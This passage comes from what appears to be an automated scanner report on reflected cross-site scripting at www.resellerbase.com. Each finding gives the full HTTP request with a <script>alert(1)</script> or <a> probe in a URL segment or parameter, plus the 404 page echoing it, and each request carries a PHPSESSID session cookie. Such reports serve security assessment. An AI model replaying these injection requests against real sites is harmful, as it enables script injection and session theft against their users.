Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes1a52c<script>alert(1)</script>d23e5c1a1fe/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5059. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7811c<script>alert(1)</script>413b7b7d50f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos7811c<script>alert(1)</script>413b7b7d50f/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos7811c<script>alert(1)</script>413b7b7d50f/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5060. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27db5<script>alert(1)</script>8cc581ae297 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images27db5<script>alert(1)</script>8cc581ae297/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images27db5<script>alert(1)</script>8cc581ae297/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5061. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ba0b9<script>alert(1)</script>8af71bced91 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/reviewba0b9<script>alert(1)</script>8af71bced91/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/reviewba0b9<script>alert(1)</script>8af71bced91/5.gif was not found on this server.</p>
...[SNIP]...

2.5062. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload e98bc<script>alert(1)</script>a28f0f83c6 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review/5.gife98bc<script>alert(1)</script>a28f0f83c6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/5.gife98bc<script>alert(1)</script>a28f0f83c6 was not found on this server.</p>
...[SNIP]...

2.5063. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fe772<script>alert(1)</script>6075190bdba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review/5.gif?fe772<script>alert(1)</script>6075190bdba=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/5.gif?fe772<script>alert(1)</script>6075190bdba=1 was not found on this server.</p>
...[SNIP]...

2.5064. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6c155<script>alert(1)</script>b6198d61a0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service6c155<script>alert(1)</script>b6198d61a0e/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service6c155<script>alert(1)</script>b6198d61a0e/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5065. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3410b<script>alert(1)</script>1cb2d5be38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names3410b<script>alert(1)</script>1cb2d5be38/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names3410b<script>alert(1)</script>1cb2d5be38/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5066. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 67e8e<script>alert(1)</script>60933bb864a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes67e8e<script>alert(1)</script>60933bb864a/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes67e8e<script>alert(1)</script>60933bb864a/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5067. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2929b<script>alert(1)</script>db4be8a9390 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos2929b<script>alert(1)</script>db4be8a9390/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos2929b<script>alert(1)</script>db4be8a9390/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5068. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e14e7<script>alert(1)</script>cc7bb15b9fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/imagese14e7<script>alert(1)</script>cc7bb15b9fe/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/imagese14e7<script>alert(1)</script>cc7bb15b9fe/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5069. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b5aea<script>alert(1)</script>a4aef58ea30 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/reviewb5aea<script>alert(1)</script>a4aef58ea30/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/reviewb5aea<script>alert(1)</script>a4aef58ea30/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5070. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload fbbc5<script>alert(1)</script>d3860540d1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review/search.phpfbbc5<script>alert(1)</script>d3860540d1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/search.phpfbbc5<script>alert(1)</script>d3860540d1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5071. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9aad3<a>7b6754beae was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search9aad3<a>7b6754beae&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search9aad3<a>7b6754beae&opt=2 was not found on this server.</p>
...[SNIP]...

2.5072. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a0d73<a>24945789380 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...a0d73<a>24945789380&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...a0d73<a>24945789380&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5073. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ca40a<script>alert(1)</script>77668e37d66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&ca40a<script>alert(1)</script>77668e37d66=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&ca40a<script>alert(1)</script>77668e37d66=1 was not found on this server.</p>
...[SNIP]...

2.5074. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 31a6d<a>f1089682e11 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=231a6d<a>f1089682e11 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=231a6d<a>f1089682e11 was not found on this server.</p>
...[SNIP]...

2.5075. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51e6a<script>alert(1)</script>b9a79a377c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service51e6a<script>alert(1)</script>b9a79a377c2/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service51e6a<script>alert(1)</script>b9a79a377c2/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5076. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7053a<script>alert(1)</script>57556becb66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

